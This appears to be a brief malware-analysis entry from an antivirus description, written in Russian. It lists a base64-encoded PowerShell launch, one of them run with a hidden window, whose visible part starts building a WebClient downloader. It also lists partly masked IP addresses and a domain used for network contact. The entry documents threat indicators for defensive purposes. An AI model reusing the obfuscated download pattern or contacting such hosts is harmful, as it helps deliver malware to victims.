Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDADEAMwAxADMANwA3AD0AKAAnAGoAJwArACcANgA0AF8AJwArACcAXwA0ADEAJwApADsAJABaADcAXwAyAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3ADkAXwBfAF8AOQA0AD0AKAAnAG...
- '19#.#41.149.194':80
- '95.##7.143.55':80
- '14#.#3.201.106':80
- '46.##.231.239':80
- DNS ASK ne#.#ipgoma.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDADEAMwAxADMANwA3AD0AKAAnAGoAJwArACcANgA0AF8AJwArACcAXwA0ADEAJwApADsAJABaADcAXwAyAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3ADkAXwBfAF8AOQA0AD0AKAAnAG...' (со скрытым окном)